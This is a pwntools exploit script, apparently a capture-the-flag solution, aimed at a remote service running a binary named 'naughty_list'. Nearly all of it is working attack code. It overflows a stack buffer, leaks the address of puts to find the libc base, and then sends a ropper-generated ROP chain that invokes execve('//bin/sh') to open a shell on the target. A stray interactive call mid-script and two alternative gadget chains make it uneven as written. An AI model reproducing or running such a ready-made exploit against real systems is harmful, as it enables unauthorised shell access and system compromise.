#!/bin/python

from pwn import *

context.terminal = ['alacritty', '-e', 'sh', '-c']


e = ELF('/usr/lib/libc.so.6')


io = remote("46.101.85.29", 30773)
#io = process("./naughty_list")
#gdb.attach(io, gdbscript = '''
#        b get_descr
#        c
#    ''')

io.recvuntil(':')
io.sendline("lol")

io.recvuntil(':')
io.sendline("lol")

io.recvuntil(':')
io.sendline("18")

io.recvuntil('[')
io.recvuntil('*')
io.recvuntil(']')
io.recvuntil(':')

RW_ADDR     = 0x602000 + 50

ROP_POP_RSI = 0x401441
ROP_PRINTF  = 0x401324
ROP_POP_RDI = 0x401443
ROP_PUTS    = 0x400780

PUTS_GOT    = 0x601f88
NAME_ADDR   = 0x602080



io.sendline(
        b'A' * 32 +
        p64(RW_ADDR) +
        #p64(ROP_POP_RSI+3) +
        #p64(PUTS_GOT) + 
        #p64(0) +
        p64(0x0000000000401361) + 
        p64(ROP_PRINTF)
    )

io.interactive()

io.recvuntil('!')
io.recvuntil('[')


puts_addr = u64(io.recv(6) + b'\x00\x00')
libc_base = puts_addr - e.symbols['puts']
system_addr = libc_base + e.symbols['system']

log.info("Puts addr: " + hex(puts_addr))
log.info("Puts offset: " + hex(e.symbols['puts']))
log.info("Libc base: " + hex(libc_base))
log.info("System addr: " + hex(system_addr))




io.recvuntil(':')
io.sendline("sh")

io.recvuntil(':')
io.sendline("lol")

io.recvuntil(':')
io.sendline("18")

io.recvuntil('[')
io.recvuntil('*')
io.recvuntil(']')



# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : p64(x)

IMAGE_BASE_0 = libc_base # f4dc1d621b6cb4af2ec69a9a84ef457acb31fa9e146aa22d0303bb8d4c599c74
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = b''

remote_rop = """
rop += rebase_0(0x0000000000021aa5) # 0x0000000000021aa5: pop r13; ret;
rop += b'//bin/sh'
rop += rebase_0(0x00000000000215bf) # 0x00000000000215bf: pop rdi; ret;
rop += rebase_0(0x00000000003eb1a0)
rop += rebase_0(0x0000000000064279) # 0x0000000000064279: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x0000000000021aa5) # 0x0000000000021aa5: pop r13; ret;
rop += p(0x0000000000000000)
rop += rebase_0(0x00000000000215bf) # 0x00000000000215bf: pop rdi; ret;
rop += rebase_0(0x00000000003eb1a8)
rop += rebase_0(0x0000000000064279) # 0x0000000000064279: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x00000000000215bf) # 0x00000000000215bf: pop rdi; ret;
rop += rebase_0(0x00000000003eb1a0)
rop += rebase_0(0x0000000000023eea) # 0x0000000000023eea: pop rsi; ret;
rop += rebase_0(0x00000000003eb1a8)
rop += rebase_0(0x0000000000001b96) # 0x0000000000001b96: pop rdx; ret;
rop += rebase_0(0x00000000003eb1a8)
rop += rebase_0(0x0000000000043ae8) # 0x0000000000043ae8: pop rax; ret;
rop += p(0x000000000000003b)
rop += rebase_0(0x00000000000d2745) # 0x00000000000d2745: syscall; ret;
"""

#local_rop = """
rop += rebase_0(0x0000000000029d18) # 0x0000000000029d18: pop r13; ret;
rop += b'//bin/sh'
rop += rebase_0(0x0000000000031f11) # 0x0000000000031f11: pop rbx; ret;
rop += rebase_0(0x00000000001c0000)
rop += rebase_0(0x00000000000574d2) # 0x00000000000574d2: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x0000000000029d18) # 0x0000000000029d18: pop r13; ret;
rop += p(0x0000000000000000)
rop += rebase_0(0x0000000000031f11) # 0x0000000000031f11: pop rbx; ret;
rop += rebase_0(0x00000000001c0008)
rop += rebase_0(0x00000000000574d2) # 0x00000000000574d2: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x0000000000027f75) # 0x0000000000027f75: pop rdi; ret;
rop += rebase_0(0x00000000001c0000)
rop += rebase_0(0x000000000002978f) # 0x000000000002978f: pop rsi; ret;
rop += rebase_0(0x00000000001c0008)
rop += rebase_0(0x00000000000f9c37) # 0x00000000000f9c37: pop rdx; pop r12; ret;
rop += rebase_0(0x00000000001c0008)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000003fe60) # 0x000000000003fe60: pop rax; ret;
rop += p(0x000000000000003b)
rop += rebase_0(0x000000000005962a) # 0x000000000005962a: syscall; ret;
#"""


io.sendline(
        b'A' * 32 +
        b'B' * 8 +
        rop
    )


io.interactive()
